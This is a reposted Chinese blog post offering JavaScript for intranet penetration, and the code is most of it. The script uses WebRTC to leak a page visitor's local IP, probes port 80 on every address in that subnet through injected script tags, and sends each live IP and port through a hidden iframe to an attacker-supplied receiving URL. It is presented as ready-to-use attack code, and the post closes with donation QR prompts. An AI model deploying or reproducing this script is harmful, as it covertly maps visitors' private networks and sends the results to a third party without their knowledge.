A-A+
js获取内(外)网真实IP地址(WebRTC)及内网端口扫描
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 | var ip_arr = []; var TagName = document.getElementsByTagName("body")[0]; function form_ip(ip,port){ //使用iframe的src属性来发送ip、port数据内容 var iframe = document.createElement("iframe"); iframe.setAttribute("src","接受的地址?接受内网ip的参数=" + ip + "&接受内网开放端口的参数=" + port); iframe.setAttribute("style","display:none") TagName.appendChild(iframe); } function getIPs(callback){ var ip_dups = {}; var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection; var mediaConstraints = { optional: [{RtpDataChannels: true}] }; var servers = undefined; if(window.webkitRTCPeerConnection) //如果想获取真实的外网IP,请把下一行改为servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]}; servers = {iceServers: []}; var pc = new RTCPeerConnection(servers, mediaConstraints); pc.onicecandidate = function(ice){ if(ice.candidate){ var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/ var ip_addr = ip_regex.exec(ice.candidate.candidate)[1]; if(ip_dups[ip_addr] === undefined) callback(ip_addr); ip_dups[ip_addr] = true; } }; pc.createDataChannel(""); pc.createOffer(function(result){ pc.setLocalDescription(result, function(){}); }, function(){}); } getIPs(function(ip){ //遍历内网ip及80端口,这里只写了80端口,多个端口,速度将会的非常慢。 ip = ip.split("."); ip.pop(); ip = ip.join("."); for(var i = 1;i<=255;i++){ var script = document.createElement("script"); var ip_url = ip + "." + i + ":80"; script.setAttribute("src","http://" + ip_url); script.setAttribute("onload","form_ip('" + ip + "." + i + "','80')"); TagName.appendChild(script); } }); |
虽然WebRTC已经不是什么新技术了,用JavaScript进行内网渗透,网上也有说明,但是都没怎么放出代码。这里就就放出我自己的写的。getIPs(function(ip){...} 效率不怎么高,如有更高者可以在下面给出。
文章为转载。来源地址:https://segmentfault.com/a/1190000002889202
布施恩德可便相知重
微信扫一扫打赏
支付宝扫一扫打赏